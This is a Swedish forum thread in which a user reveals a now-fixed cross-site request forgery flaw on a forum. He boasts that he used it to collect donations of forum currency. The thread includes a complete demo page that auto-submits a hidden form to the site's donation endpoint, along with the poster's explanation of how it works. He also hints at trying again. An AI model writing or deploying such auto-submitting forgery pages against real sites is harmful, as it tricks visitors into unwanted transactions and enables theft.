Hoppa till innehåll

Säkerhetslucka


Gäst henke37

Rekommendera inlägg

Gäst henke37

OK, tidigare idag så gick det att göra ett automatiskt forumlär(på ens egen sida), som lurade alla som besöker den att donera pengar till någon. :ph34r:

Jag upptäckte den och fick hela 2000 FM. B)

 

Demo:

<html><head><title>Sucker!</title></head>
<body onload="document.forms[0].submit();"><form action="http://forum.fuska.se/index.php?act=store&code=dodonate_money" method="post"><input type="hidden" value="10" name="amount"><input type="hidden" value="henke37" name="username"><input type="hidden" value="Sucker!" name="message"></form></body></html>

Den är fixad nu, men det är inte omöjligt att jag kommer på ett nytt sätt att ge mig FM.

Länk till kommentar
Dela på andra sajter

  • Svar 27
  • Skapat
  • Senaste svar

Ledande medlemmar i detta ämne

Ledande medlemmar i detta ämne

Demo:

<html><head><title>Sucker!</title></head>
<body onload="document.forms[0].submit();"><form action="http://forum.fuska.se/index.php?act=store&code=dodonate_money" method="post"><input type="hidden" value="10" name="amount"><input type="hidden" value="henke37" name="username"><input type="hidden" value="Sucker!" name="message"></form></body></html>

Va ? Jag hänger inte riktigt me :blink:
Länk till kommentar
Dela på andra sajter

Gäst henke37

Ok, det är en hemsida med titeln "Sucker!".

Den har ett formulär som kommer skickas till sidan som sköter penga överföringen.

Formuläret har tre dolda fält, vem som ska få pengarna, hur mycket den ska få, och ett medelande till motagaren. De fälten är satta till mig som motagare, 10Fm som "donationen" och kommentaren "Sucker".

Den har ett javascript som automatiskt skickar formuläret.

Redigerat av henke37
Länk till kommentar
Dela på andra sajter

Gå med i konversationen

Du kan skriva nu och registrera dig senare. Om du har ett konto, logga in nu för att posta med ditt konto.

Gäst
Svara på det här ämnet...

×   Klistrade in som rich text.   Klistra in som vanlig text istället

  Endast 75 emojis är tillåtet.

×   Din länk har automatiskt inbäddats.   Visa som en länk istället

×   Ditt tidigare innehåll har återställts.   Rensa redigeraren

×   Du kan inte klistra in bilder direkt. Ladda upp eller infoga bilder från URL.

×
  • Skapa ny...